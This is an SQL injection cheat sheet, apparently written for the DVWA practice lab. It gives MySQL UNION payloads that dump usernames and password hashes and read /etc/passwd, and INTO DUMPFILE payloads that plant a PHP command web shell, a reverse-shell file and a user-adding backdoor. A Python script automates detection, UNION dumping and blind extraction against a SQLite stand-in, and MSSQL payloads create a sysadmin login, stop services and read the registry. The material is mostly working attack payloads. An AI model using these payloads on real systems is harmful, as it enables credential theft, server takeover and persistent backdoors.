Boolean-based detection
• 1' and '1'='1 / 1' and '1   (true condition: the page behaves exactly like the plain request for 1)
• 1' and '1'='2 / 1' and '0   (false condition: the row disappears; a difference between the two responses shows the input reaches the query)
Finding how many columns the query returns:
• ' order by 9--    (`-- ` comments out the rest of the original query; MySQL needs a space after --, which is why payloads use --+ with + as a URL-encoded space. Raise or lower the number until an error appears: the largest number that does not error is the column count)
Union query:
• ' union select 1,2--+   shows which of the two column positions are echoed back on the page
• ' union all select database(),2--+
Select ... from ... where id='' union select user(),version()-- '   shows the database user (e.g. root@localhost) and the database version
Select ... from ... where id='' union select user(),database()-- '   shows the current database name
Select ... from ... where id='' union select user(),@@datadir-- '   shows the database data directory
Select ... from ... where id='' union select user(),@@hostname-- '   shows the server's hostname
CHAR()   builds a string from ASCII code points, e.g. CHAR(97,100,109,105,110) = 'admin', so a string can be supplied without quote characters
CONCAT()   joins its arguments into one string
MD5('')   returns the MD5 hash of the argument
SUBSTRING_INDEX(user(),'@',1)   splits user() at '@' and keeps the first part (the user name without the host)
Counting the tables in each database
• ' union select table_name,table_schema from information_schema.tables--+
• ' UNION select table_schema,count(*) FROM information_schema.tables group by table_schema--+
Listing the tables in the dvwa database
• ' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+
Listing all columns of the users table (user_id, first_name, last_name, user, password, avatar)
• ' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--+
Reading everything in the user and password columns
• ' union select user,password from dvwa.users--+
• ' union select user,password from users--+
• ' union select null,concat(user,0x3a,password) from users--+   (0x3a is ':'; null fills the first column so only one displayed position is needed)
Reading files (requires the FILE privilege)
• ' union SELECT null, load_file('/etc/passwd')--+
Writing files (combined with a file inclusion vulnerability, or a web-served path, to get a shell; the path must be allowed by secure_file_priv)
• ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php"--+
Hex-encoding the PHP code to be written keeps quote characters out of the payload:
• cat php-revers-shell.php | xxd -ps | tr -d '\n'
• ' union select null, (0x3c3f706870) INTO DUMPFILE '/tmp/x.php'--+   (0x3c3f706870 is only "<?php"; paste the full hex string produced by the command above)
Dumping the table:
• ' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--+
Idea: write a server-side script that adds a user to the table. The whole PHP file is one MySQL single-quoted string literal, so the PHP must not contain a single quote; each \\" in the payload becomes \" in the written file:
' union select null,'<?php
if(isset($_POST["submit"])) {
    $userID = $_POST["userID"];
    $first_name = $_POST["first_name"];
    $last_name = $_POST["last_name"];
    $username = $_POST["username"];
    $avatar = $_POST["avatar"];
    echo "userID: $userID<BR>";
    echo "first_name: $first_name<BR>";
    echo "last_name: $last_name<BR>";
    echo "username: $username<BR>";
    echo "avatar: $avatar<BR>";
    // connects to the local dvwa database as root with an empty password (the DVWA default)
    $con=mysqli_connect("127.0.0.1","root","","dvwa");
    if (mysqli_connect_errno()) {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    } else {
        echo "Connected to database<BR>";
    }
    // the new account gets the fixed password 123, stored as MD5 like the existing dvwa.users rows
    $password = "123";
    $sql="insert into dvwa.users values (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\")";
    if (mysqli_query($con,$sql)) {
        echo "[Successful Insertion]: $sql";
    } else {
        echo "Error inserting user: " . mysqli_error($con);
    }
    mysqli_close($con);
}
?>
<form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
    <input type="text" name="userID" value="33"><br>
    <input type="text" name="first_name" value="fh"><br>
    <input type="text" name="last_name" value="y"><br>
    <input type="text" name="username" value="yfh"><br>
    <input type="text" name="avatar" value="yfh!"><br>
    <input type="submit" name="submit" value="Submit Form"><br>
</form>' INTO DUMPFILE '/tmp/user.php'--+
When the server rejects order by / union statements, the following can be used to probe instead:
' and column is null--+   replace column with candidate names to guess column names (an unknown column errors, a real one does not)
If there is a column named user:
' and table.user is null--+   replace table with candidate names to guess the table name
' and (select dvwa from table)>0--+   replace table to guess other tables in the database
' and user.user is null--+   checks whether the user column belongs to the user table
' or user='admin   checks a value in the field
' or user like '%a%   finds rows whose user contains an "a"
' or user='admin' and password='.......   guesses the password (DVWA stores MD5 hashes, so the candidate must be the hash of the guessed password)
PS: in Kali, md5sum 1.txt gives the MD5 of the whole file; to turn a wordlist into hashes, hash each candidate separately rather than the file as a whole.
If there is no error message, blind SQL injection is needed:
1' and 1=1--+   if this returns the normal page while 1' and 1=2--+ does not, the injection exists
1' and column is not null--+   guess column names from the true/false difference in the page
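The following is an added example, not part of the original notes or of DVWA, that runs the chain above (boolean detection, ORDER BY column counting, UNION dump, the hex-literal trick, and boolean-blind extraction for the case where nothing is echoed back) against a constructed stand-in: an in-memory SQLite table with two sample rows that mimics dvwa.users, and a `vulnerable_lookup` function that pastes input into the query exactly as the vulnerable page does. MySQL-only features (information_schema, load_file, concat) are not modelled; all function and table names here are the example's own assumptions.

```python
import sqlite3

# Constructed stand-in for DVWA's dvwa.users table (sample rows: MD5 of "password" and "abc123").
SAMPLE_USERS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
]

CON = sqlite3.connect(":memory:")
CON.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
CON.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)


def vulnerable_lookup(user_input):
    """The DVWA-style vulnerable query: the input is pasted straight into the SQL text.

    Returns the rows the page would render, [] for "no rows", and None when the query
    errors (the error page); the probes below rely on telling the three apart.
    """
    sql = f"SELECT user_id, user FROM users WHERE user_id = '{user_input}'"
    try:
        return CON.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def is_injectable(lookup):
    """Boolean-based detection: a true condition keeps the row, a false one drops it."""
    baseline = lookup("1")
    return bool(baseline) and lookup("1' and '1'='1") == baseline and lookup("1' and '1'='2") == []


def count_columns(lookup, max_cols=20):
    """ORDER BY probe: the first position that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        if lookup(f"1' order by {n}-- ") is None:
            return n - 1
    return None


def union_dump(lookup):
    """UNION-based dump of user/password; the empty id makes the original SELECT match nothing."""
    rows = lookup("' union select user, password from users-- ")
    return sorted(rows) if rows else []


def hex_literal(data: bytes) -> str:
    """Same string as `xxd -ps | tr -d '\\n'` with 0x prepended: a quote-free SQL literal."""
    return "0x" + data.hex()


def blind_truth(lookup, condition):
    """One yes/no question to the oracle: does the row for id 1 survive the AND-ed condition?"""
    return bool(lookup(f"1' and ({condition})-- "))


def blind_extract(lookup, subquery, max_len=64):
    """Boolean-blind extraction of a string-valued subquery, one bisection per character.

    Uses SQLite's length()/substr()/unicode(); on MySQL use length()/substring()/ascii().
    """
    lo, hi = 0, max_len
    while lo < hi:  # bisect the length first
        mid = (lo + hi) // 2
        if blind_truth(lookup, f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    out = []
    for i in range(1, length + 1):  # then bisect each character over printable ASCII
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_truth(lookup, f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    print("injectable:", is_injectable(vulnerable_lookup))
    print("columns:", count_columns(vulnerable_lookup))
    print("union dump:", union_dump(vulnerable_lookup))
    print("hex literal for <?php:", hex_literal(b"<?php"))
    print("blind:", blind_extract(vulnerable_lookup, "select password from users where user='admin'"))
```

Against a real target each `lookup` call is one HTTP request, so the blind path costs roughly 7 requests per character plus the length search; that is why the union route is preferred whenever a column is echoed back.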
Common MSSQL injection statements (the and 1=(select ...) forms leak the value through the int conversion error message):
and exists(select * from sysobjects)   // true only on MSSQL: confirms the backend
and exists(select * from tableName)   // checks whether a table exists; tableName is the table name
and 1=(select @@VERSION)   // MSSQL version
and 1=(select db_name())   // current database name
and 1=(select @@servername)   // local server name
and 1=(select IS_SRVROLEMEMBER('sysadmin'))   // are we a sysadmin
and 1=(Select IS_MEMBER('db_owner'))   // are we db_owner of the current database
and 1=(Select HAS_DBACCESS('master'))   // do we have access to the master database
and 1=(select name from master.dbo.sysdatabases where dbid=1)   // leaks database names; step dbid through 1,2,3...
;declare @d int   // tests whether stacked (multi-statement) queries are allowed
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')   // checks whether xp_cmdshell exists
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')   // checks whether the xp_regread extended stored procedure has been removed
Adding a login named test with SA rights (requires SA):
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
Stopping or starting a service (requires SA):
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
Exposing the web site directory (reads the IIS virtual roots key from the registry into a scratch table, then leaks it through a conversion error)
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng)   or   and 1=(select count(*) from labeng where lala>1)